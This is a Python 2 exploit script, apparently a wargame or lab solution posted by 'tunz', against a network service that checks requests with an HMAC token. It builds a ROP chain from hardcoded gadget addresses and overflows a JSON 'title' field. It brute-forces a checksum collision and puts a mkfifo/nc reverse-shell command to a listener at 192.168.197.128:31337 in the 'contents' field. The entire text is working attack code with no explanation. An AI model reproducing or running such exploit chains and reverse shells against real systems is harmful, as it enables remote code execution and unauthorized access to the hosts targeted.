from socket import * from struct import * import hmac from hashlib import sha1   # contents: 0x804bdf4 # 0804: 0x8048584+7 # 8f: 804bda4+1 # 30: 80482a4   rand_plt = 0x08048f30 rand_got = 0x804bd98 memcpy = 0x8048e60 gContents = 0x804bdf4 ppppr = 0x804a26c   pop_ebx = 0x8049402 # pop ebx ; pop ebp ;; pop_eax = 0x8049b4f # pop eax ; add esp 0x5c ;; add_eax_ebx = 0x80493f9 # add eax 0x804bde4 ; add [ebx+0x5d5b04c4] eax ;; leave_ret = 0x8049431 # leave;;   s = socket(AF_INET, SOCK_STREAM) s.connect(('192.168.197.130',20003))   raw_input('go?') get=s.recv(1024).rstrip() token = get[1:len(get)-1] print token   cmd = "id\x00"   payload = "" payload += pack('<L',pop_ebx) payload += pack('<L',(rand_got - 0x5d5b04c4)&0xFFFFFFFF) # ebx payload += "AAAA" # ebp   payload += pack('<L',pop_eax) payload += pack('<L',0xf7fbd6cc) payload += "A"*(0x5c)   payload += pack('<L',add_eax_ebx) # eax = 0x94b0   payload += pack('<L',memcpy) payload += pack('<L',ppppr+1) payload += pack('<L',gContents-5) payload += pack('<L',0x8048584+7) payload += "\\\\u0100\\\\u0000" payload += pack('<L',memcpy) payload += pack('<L',ppppr+1) payload += pack('<L',gContents-6) payload += pack('<L',0x8048584+8) payload += "\\\\u0100\\\\u0000" payload += pack('<L',memcpy) payload += pack('<L',ppppr+1) payload += pack('<L',gContents-7) payload += pack('<L',0x804bbb4+1) payload += "\\\\u0100\\\\u0000" payload += pack('<L',memcpy) payload += pack('<L',ppppr+1) payload += pack('<L',gContents-8) payload += pack('<L',0x80482a4) payload += "\\\\u0100\\\\u0000"   payload += pack('<L',ppppr+3) payload += pack('<L', gContents-12) # ebp   payload += pack('<L',leave_ret)   lists = range(ord('a'),ord('z')+1)+range(ord('A'),ord('Z')+1)+range(ord('0'),ord('9')+1)   breakall=0   for i in lists: for j in lists: for k in lists: for l in lists: trys = chr(i)+chr(j)+chr(k)+chr(l) print trys json = '{"contents":"mkfifo /tmp/tunz; nc 192.168.197.128 31337 0< /tmp/tunz | /bin/sh 1> /tmp/tunz;", "title":"'+trys+"A"*123+"\\\\u0030"+"A"*31+payload+'", "serverip":"192.168.197.128:31337"}' checksum = hmac.new(token,token+"\n"+json,sha1).hexdigest() print checksum if checksum[0:4] == "0000": breakall=1 break if breakall==1: break if breakall==1: break if breakall==1: break   print "Send: "+token+"\n"+json print checksum   s.send(token+"\n"+json) s.close()


posted by tunz